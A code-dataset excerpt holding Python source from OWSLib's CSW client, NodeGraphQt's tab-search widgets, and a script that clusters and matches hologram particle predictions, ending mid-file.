val.find(util.nspath_eval('csw:totalInserted', namespaces))\n self.results['inserted'] = int(util.testXMLValue(ts))\n ts = val.find(util.nspath_eval('csw:totalUpdated', namespaces))\n self.results['updated'] = int(util.testXMLValue(ts))\n ts = val.find(util.nspath_eval('csw:totalDeleted', namespaces))\n self.results['deleted'] = int(util.testXMLValue(ts))\n\n def _setesnel(self, esn):\n \"\"\" Set the element name to parse depending on the ElementSetName requested \"\"\"\n el = 'Record'\n if esn == 'brief':\n el = 'BriefRecord'\n if esn == 'summary':\n el = 'SummaryRecord'\n return el\n\n def _setidentifierkey(self, el):\n if el is None:\n return 'owslib_random_%i' % random.randint(1, 65536)\n else:\n return el\n\n def _setrootelement(self, el):\n if etree.__name__ == 'lxml.etree': # apply nsmap\n return etree.Element(util.nspath_eval(el, namespaces), nsmap=namespaces)\n else:\n return etree.Element(util.nspath_eval(el, namespaces))\n\n def _setconstraint(self, parent, qtype=None, propertyname='csw:AnyText', keywords=[], bbox=None, cql=None,\n identifier=None):\n if keywords or bbox is not None or qtype is not None or cql is not None or identifier is not None:\n node0 = etree.SubElement(parent, util.nspath_eval('csw:Constraint', namespaces))\n node0.set('version', '1.1.0')\n\n if identifier is not None: # set identifier filter, overrides all other parameters\n flt = fes.FilterRequest()\n node0.append(flt.set(identifier=identifier))\n elif cql is not None: # send raw CQL query\n # CQL passed, overrides all other parameters\n node1 = etree.SubElement(node0, util.nspath_eval('csw:CqlText', namespaces))\n node1.text = cql\n else: # construct a Filter request\n flt = fes.FilterRequest()\n node0.append(flt.set(qtype=qtype, keywords=keywords, propertyname=propertyname, bbox=bbox))\n\n def _invoke(self):\n # do HTTP request\n\n request_url = self.url\n\n # Get correct URL based on Operation list.\n\n # If skip_caps=True, then self.operations has not been set, so use\n # default URL.\n if hasattr(self, 'operations'):\n caller = inspect.stack()[1][3]\n if caller == 'getrecords2':\n caller = 'getrecords'\n try:\n op = self.get_operation_by_name(caller)\n if isinstance(self.request, str): # GET KVP\n get_verbs = [x for x in op.methods if x.get('type').lower() == 'get']\n request_url = get_verbs[0].get('url')\n else:\n post_verbs = [x for x in op.methods if x.get('type').lower() == 'post']\n if len(post_verbs) > 1:\n # Filter by constraints. We must match a PostEncoding of \"XML\"\n for pv in post_verbs:\n for const in pv.get('constraints'):\n if const.name.lower() == 'postencoding':\n values = [v.lower() for v in const.values]\n if 'xml' in values:\n request_url = pv.get('url')\n break\n else:\n # Well, just use the first one.\n request_url = post_verbs[0].get('url')\n elif len(post_verbs) == 1:\n request_url = post_verbs[0].get('url')\n except Exception: # no such luck, just go with request_url\n pass\n\n if isinstance(self.request, str): # GET KVP\n self.request = '%s%s' % (bind_url(request_url), self.request)\n self.response = openURL(\n self.request, None, 'Get', timeout=self.timeout, auth=self.auth\n ).read()\n else:\n self.request = cleanup_namespaces(self.request)\n # Add any namespaces used in the \"typeNames\" attribute of the\n # csw:Query element to the query's xml namespaces.\n for query in self.request.findall(util.nspath_eval('csw:Query', namespaces)):\n ns = query.get(\"typeNames\", None)\n if ns is not None:\n # Pull out \"gmd\" from something like \"gmd:MD_Metadata\" from the list\n # of typenames\n ns_keys = [x.split(':')[0] for x in ns.split(' ')]\n self.request = add_namespaces(self.request, ns_keys)\n self.request = add_namespaces(self.request, 'ows')\n\n self.request = util.element_to_string(self.request, encoding='utf-8')\n\n self.response = http_post(request_url, self.request, self.lang, self.timeout, auth=self.auth)\n\n # parse result see if it's XML\n self._exml = etree.parse(BytesIO(self.response))\n\n # it's XML. Attempt to decipher whether the XML response is CSW-ish \"\"\"\n valid_xpaths = [\n util.nspath_eval('ows:ExceptionReport', namespaces),\n util.nspath_eval('csw:Capabilities', namespaces),\n util.nspath_eval('csw:DescribeRecordResponse', namespaces),\n util.nspath_eval('csw:GetDomainResponse', namespaces),\n util.nspath_eval('csw:GetRecordsResponse', namespaces),\n util.nspath_eval('csw:GetRecordByIdResponse', namespaces),\n util.nspath_eval('csw:HarvestResponse', namespaces),\n util.nspath_eval('csw:TransactionResponse', namespaces)\n ]\n\n if self._exml.getroot().tag not in valid_xpaths:\n raise RuntimeError('Document is XML, but not CSW-ish')\n\n # check if it's an OGC Exception\n val = self._exml.find(util.nspath_eval('ows:Exception', namespaces))\n if val is not None:\n raise ows.ExceptionReport(self._exml, self.owscommon.namespace)\n else:\n self.exceptionreport = None\n\n\nclass CswRecord(object):\n \"\"\" Process csw:Record, csw:BriefRecord, csw:SummaryRecord \"\"\"\n def __init__(self, record):\n\n if hasattr(record, 'getroot'): # standalone document\n self.xml = etree.tostring(record.getroot())\n else: # part of a larger document\n self.xml = etree.tostring(record)\n\n # check to see if Dublin Core record comes from\n # rdf:RDF/rdf:Description container\n # (child content model is identical)\n self.rdf = False\n rdf = record.find(util.nspath_eval('rdf:Description', namespaces))\n if rdf is not None:\n self.rdf = True\n record = rdf\n\n # some CSWs return records with multiple identifiers based on\n # different schemes. Use the first dc:identifier value to set\n # self.identifier, and set self.identifiers as a list of dicts\n val = record.find(util.nspath_eval('dc:identifier', namespaces))\n self.identifier = util.testXMLValue(val)\n\n self.identifiers = []\n for i in record.findall(util.nspath_eval('dc:identifier', namespaces)):\n d = {}\n d['scheme'] = i.attrib.get('scheme')\n d['identifier'] = i.text\n self.identifiers.append(d)\n\n val = record.find(util.nspath_eval('dc:type', namespaces))\n self.type = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:title', namespaces))\n self.title = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:alternative', namespaces))\n self.alternative = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:isPartOf', namespaces))\n self.ispartof = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:abstract', namespaces))\n self.abstract = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:date', namespaces))\n self.date = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:created', namespaces))\n self.created = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:issued', namespaces))\n self.issued = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:relation', namespaces))\n self.relation = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:temporal', namespaces))\n self.temporal = util.testXMLValue(val)\n\n self.uris = [] # list of dicts\n for i in record.findall(util.nspath_eval('dc:URI', namespaces)):\n uri = {}\n uri['protocol'] = util.testXMLValue(i.attrib.get('protocol'), True)\n uri['name'] = util.testXMLValue(i.attrib.get('name'), True)\n uri['description'] = util.testXMLValue(i.attrib.get('description'), True)\n uri['url'] = util.testXMLValue(i)\n\n self.uris.append(uri)\n\n self.references = [] # list of dicts\n for i in record.findall(util.nspath_eval('dct:references', namespaces)):\n ref = {}\n ref['scheme'] = util.testXMLValue(i.attrib.get('scheme'), True)\n ref['url'] = util.testXMLValue(i)\n\n self.references.append(ref)\n\n val = record.find(util.nspath_eval('dct:modified', namespaces))\n self.modified = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:creator', namespaces))\n self.creator = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:publisher', namespaces))\n self.publisher = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:coverage', namespaces))\n self.coverage = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:contributor', namespaces))\n self.contributor = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:language', namespaces))\n self.language = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:source', namespaces))\n self.source = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:rightsHolder', namespaces))\n self.rightsholder = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:accessRights', namespaces))\n self.accessrights = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dct:license', namespaces))\n self.license = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('dc:format', namespaces))\n self.format = util.testXMLValue(val)\n\n self.subjects = []\n for i in record.findall(util.nspath_eval('dc:subject', namespaces)):\n self.subjects.append(util.testXMLValue(i))\n\n self.rights = []\n for i in record.findall(util.nspath_eval('dc:rights', namespaces)):\n self.rights.append(util.testXMLValue(i))\n\n val = record.find(util.nspath_eval('dct:spatial', namespaces))\n self.spatial = util.testXMLValue(val)\n\n val = record.find(util.nspath_eval('ows:BoundingBox', namespaces))\n if val is not None:\n self.bbox = ows.BoundingBox(val, namespaces['ows'])\n else:\n self.bbox = None\n\n val = record.find(util.nspath_eval('ows:WGS84BoundingBox', namespaces))\n if val is not None:\n self.bbox_wgs84 = ows.WGS84BoundingBox(val, namespaces['ows'])\n else:\n self.bbox_wgs84 = None\n","sub_path":"owslib/csw.py","file_name":"csw.py","file_ext":"py","file_size_in_byte":36985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"13245433","text":"#!/usr/bin/python\nfrom NodeGraphQt import QtCore, QtWidgets,QtGui\n\nfrom NodeGraphQt.widgets.stylesheet import STYLE_TABSEARCH, STYLE_TABSEARCH_LIST, STYLE_QMENU\n\n\nclass TabSearchCompleter(QtWidgets.QCompleter):\n \"\"\"\n QCompleter adapted from:\n https://stackoverflow.com/questions/5129211/qcompleter-custom-completion-rules\n \"\"\"\n\n def __init__(self, nodes=None, parent=None):\n super(TabSearchCompleter, self).__init__(nodes, parent)\n self.setCompletionMode(self.PopupCompletion)\n self.setCaseSensitivity(QtCore.Qt.CaseInsensitive)\n self._local_completion_prefix = ''\n self._using_orig_model = False\n self._source_model = None\n self._filter_model = None\n\n def splitPath(self, path):\n self._local_completion_prefix = path\n self.updateModel()\n\n if self._filter_model.rowCount() == 0:\n self._using_orig_model = False\n self._filter_model.setSourceModel(QtCore.QStringListModel([]))\n return []\n return []\n\n def updateModel(self):\n if not self._using_orig_model:\n self._filter_model.setSourceModel(self._source_model)\n\n pattern = QtCore.QRegExp(self._local_completion_prefix,\n QtCore.Qt.CaseInsensitive,\n QtCore.QRegExp.FixedString)\n self._filter_model.setFilterRegExp(pattern)\n\n def setModel(self, model):\n self._source_model = model\n self._filter_model = QtCore.QSortFilterProxyModel(self)\n self._filter_model.setSourceModel(self._source_model)\n super(TabSearchCompleter, self).setModel(self._filter_model)\n self._using_orig_model = True\n\n\nclass TabSearchWidget(QtWidgets.QLineEdit):\n\n search_submitted = QtCore.Signal(str)\n\n def __init__(self, parent=None, node_dict=None):\n super(TabSearchWidget, self).__init__(parent)\n self.setAttribute(QtCore.Qt.WA_MacShowFocusRect, 0)\n self.setStyleSheet(STYLE_TABSEARCH)\n self.setMinimumSize(200, 22)\n self.setTextMargins(2, 0, 2, 0)\n self.hide()\n\n self._node_dict = node_dict or {}\n\n node_names = sorted(self._node_dict.keys())\n self._model = QtCore.QStringListModel(node_names, self)\n\n self._completer = TabSearchCompleter()\n self._completer.setModel(self._model)\n self.setCompleter(self._completer)\n\n popup = self._completer.popup()\n popup.setStyleSheet(STYLE_TABSEARCH_LIST)\n popup.clicked.connect(self._on_search_submitted)\n self.returnPressed.connect(self._on_search_submitted)\n\n def __repr__(self):\n return '<{} at {}>'.format(self.__class__.__name__, hex(id(self)))\n\n def _on_search_submitted(self, index=0):\n node_type = self._node_dict.get(self.text())\n if not node_type:\n model = self._completer.popup().model()\n text = model.data(model.index(0, 0))\n node_type = self._node_dict.get(text)\n\n if node_type:\n self.search_submitted.emit(node_type)\n\n self.close()\n self.parentWidget().clearFocus()\n\n def showEvent(self, event):\n super(TabSearchWidget, self).showEvent(event)\n self.setFocus()\n self.setText(\"\")\n self.completer().popup().show()\n self.completer().complete()\n\n def mousePressEvent(self, event):\n if not self.text():\n self.completer().complete()\n\n def set_nodes(self, node_dict=None):\n self._node_dict = {}\n for name, node_types in node_dict.items():\n if len(node_types) == 1:\n self._node_dict[name] = node_types[0]\n continue\n for node_id in node_types:\n self._node_dict['{} ({})'.format(name, node_id)] = node_id\n node_names = sorted(self._node_dict.keys())\n self._model.setStringList(node_names)\n self._completer.setModel(self._model)\n\n\nclass TabSearchMenuWidget(QtWidgets.QLineEdit):\n search_submitted = QtCore.Signal(str)\n\n def __init__(self, parent=None, node_dict=None):\n super(TabSearchMenuWidget, self).__init__(parent)\n self.setAttribute(QtCore.Qt.WA_MacShowFocusRect, 0)\n self.setStyleSheet(STYLE_TABSEARCH)\n self.setMinimumSize(200, 22)\n self.setTextMargins(2, 0, 2, 0)\n\n self._node_dict = node_dict or {}\n if self._node_dict:\n self._generate_items_from_node_dict()\n\n self.SearchMenu = QtWidgets.QMenu()\n searchWidget = QtWidgets.QWidgetAction(self)\n searchWidget.setDefaultWidget(self)\n self.SearchMenu.addAction(searchWidget)\n self.SearchMenu.setStyleSheet(STYLE_QMENU)\n\n self._actions = []\n self._menus = {}\n self._searched_actions = []\n\n self.returnPressed.connect(self._on_search_submitted)\n self.textChanged.connect(self._on_text_changed)\n\n def __repr__(self):\n return '<{} at {}>'.format(self.__class__.__name__, hex(id(self)))\n\n def _on_text_changed(self,text):\n self._clear_actions()\n\n if not text:\n self._set_menu_visible(True)\n return\n\n self._set_menu_visible(False)\n\n self._searched_actions = [action for action in self._actions\\\n if text.lower() in action.text().lower()]\n\n self.SearchMenu.addActions(self._searched_actions)\n\n def _clear_actions(self):\n for action in self._searched_actions:\n self.SearchMenu.removeAction(action)\n self._searched_actions = []\n\n def _set_menu_visible(self,visible):\n for menu in self._menus.values():\n menu.menuAction().setVisible(visible)\n\n def _close(self):\n self._set_menu_visible(False)\n self.SearchMenu.setVisible(False)\n self.SearchMenu.menuAction().setVisible(False)\n\n def _show(self):\n self.SearchMenu.exec_(QtGui.QCursor.pos())\n self.setText(\"\")\n self.setFocus()\n self._set_menu_visible(True)\n\n def _on_search_submitted(self):\n action = self.sender()\n if type(action) is not QtWidgets.QAction:\n if len(self._searched_actions) > 0:\n action = self._searched_actions[0]\n else:\n self._close()\n return\n\n text = action.text()\n node_type = self._node_dict.get(text)\n if node_type:\n self.search_submitted.emit(node_type)\n\n self._close()\n\n def _generate_items_from_node_dict(self):\n node_names = sorted(self._node_dict.keys())\n node_types = sorted(self._node_dict.values())\n\n self._menus.clear()\n self._actions.clear()\n self._searched_actions.clear()\n\n for node_type in node_types:\n menu_name = \".\".join(node_type.split(\".\")[:-1])\n if menu_name not in self._menus.keys():\n new_menu = QtWidgets.QMenu(menu_name)\n new_menu.setStyleSheet(STYLE_QMENU)\n self._menus[menu_name] = new_menu\n self.SearchMenu.addMenu(new_menu)\n\n for name in node_names:\n action = QtWidgets.QAction(name, self)\n action.setText(name)\n action.triggered.connect(self._on_search_submitted)\n self._actions.append(action)\n\n menu_name = self._node_dict[name]\n menu_name = \".\".join(menu_name.split(\".\")[:-1])\n\n if menu_name in self._menus.keys():\n self._menus[menu_name].addAction(action)\n else:\n self.SearchMenu.addAction(action)\n\n def set_nodes(self, node_dict=None):\n if not self._node_dict:\n self._node_dict.clear()\n for name, node_types in node_dict.items():\n if len(node_types) == 1:\n self._node_dict[name] = node_types[0]\n continue\n for node_id in node_types:\n self._node_dict['{} ({})'.format(name, node_id)] = node_id\n self._generate_items_from_node_dict()\n\n self._show()\n\n","sub_path":"NodeGraphQt/widgets/tab_search.py","file_name":"tab_search.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435831558","text":"from scipy.spatial import distance_matrix\nfrom argparse import ArgumentParser\nimport numpy as np\nimport logging\nimport math\nimport time\nimport tqdm\nfrom collections import defaultdict\nimport pandas as pd\nimport joblib\nimport scipy.ndimage\nimport glob\nimport yaml\nimport os\n\n\nlogger = logging.getLogger(__name__)\n\n\nscale_x = 2.96e-06\nscale_y = 2.96e-06 \nscale_z = 1.00e-06\nscale_d = 2.96e-06 * 0.0\n\n\nscales = [scale_x, scale_y, scale_z, scale_d]\n\n\nclass Threshold:\n\n def __init_(self):\n self.n = None\n\n def load_dist_matrix(self, h_idx, coordinates):\n\n vol = np.array(coordinates[h_idx], dtype=float)\n\n \"\"\"apply the relevant scale transformation\"\"\"\n vol[:, 0] *= scale_x\n vol[:, 1] *= scale_y\n vol[:, 2] *= scale_z\n vol[:, 3] *= scale_d\n\n self.vol = vol\n self.dist_matrix = distance_matrix(vol, vol, p = 1)\n self.n = self.dist_matrix.shape[0]\n\n def search(self, threshold):\n results = {}\n for label in range(self.n):\n \"\"\"Find experiments at or below the threshold\"\"\"\n members = np.where(self.dist_matrix[label] <= threshold)[0]\n results[label] = [x for x in members if x != label]\n results = sorted([\n [len(x), i, x] for (i, x) in results.items()\n ])\n return results # sorted(results, reverse=True)\n\n def Cluster(self, threshold):\n \"\"\"Use Leader clustering\"\"\"\n true_singletons = []\n false_singletons = []\n clusters = []\n seen = set()\n for (size, experiment, members) in self.search(threshold):\n if experiment in seen:\n \"\"\"Can't use a centroid which is already assigned\"\"\"\n continue\n seen.add(experiment)\n \"\"\"Figure out which ones haven't yet been assigned\"\"\"\n unassigned = set(members) - seen\n if not unassigned:\n false_singletons.append(experiment)\n continue\n \"\"\"this is a new cluster\"\"\"\n clusters.append((experiment, unassigned))\n seen.update(unassigned)\n\n seen = []\n for a, b in clusters:\n seen.append(a)\n for c in b:\n if c not in seen:\n seen.append(c)\n\n not_clustered = set(range(self.n)) - set(seen)\n return sorted(clusters, key=lambda x: -len(x[1])), list(not_clustered)\n\n\ndef cluster_after_leader(clust):\n clust_max_x = clust[:, 0] + clust[:, 3]\n clust_min_x = clust[:, 0] - clust[:, 3]\n clust_max_y = clust[:, 1] + clust[:, 3]\n clust_min_y = clust[:, 1] - clust[:, 3]\n dx = max(clust_max_x) - min(clust_min_x)\n dy = max(clust_max_y) - min(clust_min_y)\n size = max(dx, dy)\n l = np.zeros((size, size))\n array = np.zeros((size, size))\n for circle in clust:\n x, y, z, d = circle\n x -= min(clust_min_x)\n y -= min(clust_min_y)\n b, a = np.ogrid[-x:size-x, -y:size-y]\n mask = a*a + b*b <= (d/2)**2\n array[mask] = 1\n arr, n = scipy.ndimage.label(array)\n _centroid = scipy.ndimage.find_objects(arr)\n particles = []\n for k, particle in enumerate(_centroid):\n xind = (particle[0].stop + particle[0].start) / 2.\n yind = (particle[1].stop + particle[1].start) / 2.\n# dind = max([\n# abs(particle[0].stop - particle[0].start), \n# abs(particle[1].stop - particle[1].start)\n# ])\n dind = 2 * ((arr == (k+1)).sum() / np.pi)**(1/2)\n xind += min(clust_min_x)\n yind += min(clust_min_y)\n particles.append([xind, yind, dind])\n # To get z, loop through the particles and pick which ever its closer\n particle_z = defaultdict(list)\n for circle in clust:\n d = [\n distance(circle[:2], particle[:2]) for k, particle in enumerate(particles)\n ]\n matched = np.argwhere(np.array(d) == min(d))[0][0]\n particle_z[matched].append(circle[2])\n coordinates = []\n for k, particle in enumerate(particles):\n x, y, d = particle\n coordinates.append([\n x, y, np.mean(particle_z[k]), d\n ])\n return coordinates\n \ndef diameter_average(coors, centroid, clusters):\n centroid = [coors[centroid]]\n centroid += [coors[x] for x in clusters]\n # try to cluster a second time \n centroid = cluster_after_leader(np.array(centroid))\n return centroid\n\n centroid = np.array(centroid).astype(float)\n max_d = max(centroid[:, 3])\n centroid = np.average(centroid, axis=0)\n centroid[3] = max_d\n return centroid\n\n\ndef distance(x, y):\n return math.sqrt(sum([(scales[i] * x[i] - scales[i] * y[i])**2 for i, _ in enumerate(x)]))\n\n\ndef create_table(distance_threshold=0.001,\n true_coordinates=None,\n pred_coordinates=None,\n match=True):\n\n mapping_table = defaultdict(list)\n mapping_table[\"rmse\"] = {}\n df_table = defaultdict(list)\n\n if match:\n holo_indices = list(set(list(true_coordinates.keys()) + list(pred_coordinates.keys())))\n else:\n holo_indices = pred_coordinates.keys()\n \n for h_idx in tqdm.tqdm(sorted(holo_indices)):\n\n logger.info(\n f\"Starting hologram {h_idx} ...\")\n\n if match:\n if h_idx not in pred_coordinates:\n if len(true_coordinates[h_idx]) != 0:\n for p in true_coordinates[h_idx]:\n mapping_table[h_idx].append([\" \".join(map(str, p)), None])\n x, y, z, d = list(map(float, p))\n df_table[\"h\"].append(h_idx)\n df_table[\"x_t\"].append(x)\n df_table[\"y_t\"].append(y)\n df_table[\"z_t\"].append(z)\n df_table[\"d_t\"].append(d)\n df_table[\"x_p\"].append(np.nan)\n df_table[\"y_p\"].append(np.nan)\n df_table[\"z_p\"].append(np.nan)\n df_table[\"d_p\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n continue\n\n if len(pred_coordinates[h_idx]) == 0:\n for p in true_coordinates[h_idx]:\n mapping_table[h_idx].append([\" \".join(map(str, p)), None])\n x, y, z, d = list(map(float, p))\n df_table[\"h\"].append(h_idx)\n df_table[\"x_t\"].append(x)\n df_table[\"y_t\"].append(y)\n df_table[\"z_t\"].append(z)\n df_table[\"d_t\"].append(d)\n df_table[\"x_p\"].append(np.nan)\n df_table[\"y_p\"].append(np.nan)\n df_table[\"z_p\"].append(np.nan)\n df_table[\"d_p\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n continue\n\n \"\"\"Cluster particles using the distance matrix and threshold\"\"\"\n start_time = time.time()\n t = Threshold()\n t.load_dist_matrix(h_idx, pred_coordinates)\n clusters, unassigned = t.Cluster(distance_threshold)\n\n \"\"\"Create numpy arrays from the centroids/unassigned\"\"\"\n pred_r_centroids = []\n for centroid, members in clusters:\n results = diameter_average(pred_coordinates[h_idx], centroid, members)\n pred_r_centroids += [np.array(x).astype(float) for x in results]\n pred_r_centroids = np.array(pred_r_centroids)\n \n #pred_r_centroids = np.array([diameter_average(\n # pred_coordinates[h_idx], centroid, members) for centroid, members in clusters]).astype(float)\n \n pred_r_not_matched = np.array(\n [pred_coordinates[h_idx][idx] for idx in unassigned]).astype(float)\n if pred_r_centroids.shape[0] > 0:\n if pred_r_not_matched.shape[0] > 0:\n pred_r = np.concatenate([pred_r_centroids, pred_r_not_matched])\n else:\n pred_r = pred_r_centroids\n else:\n pred_r = pred_r_not_matched\n ctime = time.time() - start_time\n\n logger.info(\n f\"... clustering completed in {ctime} s, {pred_r_centroids.shape[0]} clusters, {len(unassigned)} unassigned, {pred_r.shape[0]} total\")\n\n# with open(\"cluster_results.txt\", \"a+\") as fid:\n# fid.write(f\"{distance_threshold} {h_idx} {len(clusters)} {len(unassigned)} {pred_r.shape[0]}\\n\")\n \n if not match or not true_coordinates:\n mapping_table[h_idx] = [list(x) for x in pred_r]\n for coors in pred_r:\n x, y, z, d = list(coors)\n df_table[\"h\"].append(h_idx)\n df_table[\"x_p\"].append(x)\n df_table[\"y_p\"].append(y)\n df_table[\"z_p\"].append(z)\n df_table[\"d_p\"].append(d)\n df_table[\"x_t\"].append(np.nan)\n df_table[\"y_t\"].append(np.nan)\n df_table[\"z_t\"].append(np.nan)\n df_table[\"d_t\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n continue\n\n \"\"\"\n Match the clustered particles against the true particles (if they exist)\n \"\"\"\n if len(true_coordinates[h_idx]) == 0:\n for p in pred_coordinates[h_idx]:\n mapping_table[h_idx].append([None, \" \".join(map(str, p))])\n x, y, z, d = p\n df_table[\"h\"].append(h_idx)\n df_table[\"x_p\"].append(x)\n df_table[\"y_p\"].append(y)\n df_table[\"z_p\"].append(z)\n df_table[\"d_p\"].append(d)\n df_table[\"x_t\"].append(np.nan)\n df_table[\"y_t\"].append(np.nan)\n df_table[\"z_t\"].append(np.nan)\n df_table[\"d_t\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n \n logger.info(\n f\"... matched 0 particles\")\n \n continue\n \n else: \n true_r = np.array(true_coordinates[h_idx]).astype(float)\n\n \"\"\"Compute the distance matrix b/t the two datasets --> pandas df\"\"\"\n start_time = time.time()\n result_dict = defaultdict(list)\n for k1, x in enumerate(pred_r):\n for k2, y in enumerate(true_r):\n error = distance(x, y)\n result_dict[\"pred_id\"].append(k1)\n result_dict[\"true_id\"].append(k2)\n result_dict[\"pred_coor\"].append(\n \" \".join([str(xx) for xx in list(x)]))\n result_dict[\"true_coor\"].append(\n \" \".join([str(yy) for yy in list(y)]))\n result_dict[\"error\"].append(np.mean(np.abs(error)))\n df = pd.DataFrame(result_dict)\n\n \"\"\"Add to the mapping table\"\"\"\n pred_seen = []\n true_seen = []\n error = []\n while True:\n c1 = df[\"true_id\"].isin(true_seen)\n c2 = df[\"pred_id\"].isin(pred_seen)\n c = c1 | c2\n if c.sum() == df.shape[0]:\n break\n smallest_error = df[~c][\"error\"] == min(df[~c][\"error\"])\n error.append(list(df[~c][smallest_error][\"error\"])[0])\n true_id = list(df[~c][smallest_error][\"true_id\"])[0]\n pred_id = list(df[~c][smallest_error][\"pred_id\"])[0]\n pred_seen.append(pred_id)\n true_seen.append(true_id)\n\n pred_n = list(df[~c][smallest_error][\"pred_coor\"])[0]\n true_n = list(df[~c][smallest_error][\"true_coor\"])[0]\n mapping_table[h_idx].append([true_n, pred_n])\n\n \"\"\"Add matched to the table/dataframe\"\"\"\n for idx, (true, pred) in enumerate(mapping_table[h_idx]):\n df_table[\"h\"].append(h_idx)\n x, y, z, d = list(map(float, true.split(\" \")))\n df_table[\"x_t\"].append(x)\n df_table[\"y_t\"].append(y)\n df_table[\"z_t\"].append(z)\n df_table[\"d_t\"].append(d)\n x, y, z, d = list(map(float, pred.split(\" \")))\n df_table[\"x_p\"].append(x)\n df_table[\"y_p\"].append(y)\n df_table[\"z_p\"].append(z)\n df_table[\"d_p\"].append(d)\n df_table[\"rmse\"].append(error[idx])\n n_match = len(mapping_table[h_idx])\n\n \"\"\"Add non-matched to the table/dataframe\"\"\"\n\n true_unmatched = list(\n set(df[\"true_coor\"].unique()) - set([x[0] for x in mapping_table[h_idx]]))\n pred_unmatched = list(\n set(df[\"pred_coor\"].unique()) - set([x[1] for x in mapping_table[h_idx]]))\n\n for p in true_unmatched:\n mapping_table[h_idx].append([p, None])\n x, y, z, d = list(map(float, p.split(\" \")))\n df_table[\"h\"].append(h_idx)\n df_table[\"x_t\"].append(x)\n df_table[\"y_t\"].append(y)\n df_table[\"z_t\"].append(z)\n df_table[\"d_t\"].append(d)\n df_table[\"x_p\"].append(np.nan)\n df_table[\"y_p\"].append(np.nan)\n df_table[\"z_p\"].append(np.nan)\n df_table[\"d_p\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n\n for p in pred_unmatched:\n mapping_table[h_idx].append([None, p])\n x, y, z, d = list(map(float, p.split(\" \")))\n df_table[\"h\"].append(h_idx)\n df_table[\"x_p\"].append(x)\n df_table[\"y_p\"].append(y)\n df_table[\"z_p\"].append(z)\n df_table[\"d_p\"].append(d)\n df_table[\"x_t\"].append(np.nan)\n df_table[\"y_t\"].append(np.nan)\n df_table[\"z_t\"].append(np.nan)\n df_table[\"d_t\"].append(np.nan)\n df_table[\"rmse\"].append(np.nan)\n\n mtime = time.time() - start_time\n logger.info(\n f\"... matched {n_match} particles in {mtime} s. RMSE = {np.mean(error)}\")\n\n mapping_table[\"rmse\"][h_idx] = error\n\n return mapping_table, df_table\n\n\nif __name__ == \"__main__\":\n\n description = \"1. Cluster predictions using (x,y,x,d) predictions in N planes from M workers\\n\"\n description += \"2. Pair matched particles against true or the standard method predictions\"\n\n parser = ArgumentParser(\n description=description\n )\n parser.add_argument(\n \"-c\",\n dest=\"model_config\",\n type=str,\n default=False,\n help=\"Path to the model configuration (yml) containing your inputs.\"\n )\n parser.add_argument(\n \"-m\",\n dest=\"match\",\n type=str,\n default=False,\n help=\"Whether to match predictions against truth or standard method values.\"\n )\n parser.add_argument(\n \"-t\",\n dest=\"table\",\n type=str,\n default=False,\n help=\"Pandas table to match predicted particles against.\"\n )\n\n args_dict = vars(parser.parse_args())\n config_file = args_dict.pop(\"model_config\")\n match = bool(int(args_dict.pop(\"match\")))\n table = args_dict.pop(\"table\")\n table = str(table) if table else False\n\n if not os.path.isfile(config_file):\n raise OSError(\"A mode config file is required. Exiting.\")\n \n with open(config_file) as cf:\n conf = yaml.load(cf, Loader=yaml.FullLoader)\n\n n_nodes = conf[\"inference\"][\"n_nodes\"]\n n_gpus = conf[\"inference\"][\"gpus_per_node\"]\n threads_per_gpu = conf[\"inference\"][\"threads_per_gpu\"]\n workers = int(n_nodes * n_gpus * threads_per_gpu)\n\n save_loc = conf[\"save_loc\"]\n inf_save_loc = conf[\"inference\"][\"data_set\"][\"name\"]\n path_to_preds = os.path.join(save_loc, inf_save_loc, \"propagated\")\n distance_threshold = conf[\"inference\"][\"distance_threshold\"]\n\n ############################################################\n # Initialize logger to stream to stdout\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s:%(name)s:%(message)s')\n\n # Stream output to stdout\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n # Save the log file\n logger_name = os.path.join(os.path.join(\n save_loc, f\"{inf_save_loc}/clustering_log.txt\"))\n fh = logging.FileHandler(logger_name,\n mode=\"w\",\n encoding='utf-8')\n fh.setLevel(logging.INFO)\n fh.setFormatter(formatter)\n root.addHandler(fh)\n ############################################################\n \"\"\"Obtain the pred and true files produced by the workers\"\"\"\n fns = glob.glob(os.path.join(path_to_preds, \"*txt\"))\n\n preds = [x for x in fns if \"pred\" in x.split(\"/\")[-1]]\n\n logger.info(f\"The number of workers used during inference was {workers}\")\n logger.info(f\"There {len(preds)} files containing predicted coordinates\")\n\n if len(preds) != workers:\n logger.warning(\n \"The number of files with coordinates is not equal to the number of workers in the config file\")\n\n pred_coordinates = defaultdict(list)\n for fn in preds:\n with open(fn, \"r\") as fid:\n for line in fid.readlines():\n h, x, y, z, d = list(map(int, line.split(\" \")))\n pred_coordinates[h].append([x, y, z, d])\n\n if match:\n if table:\n 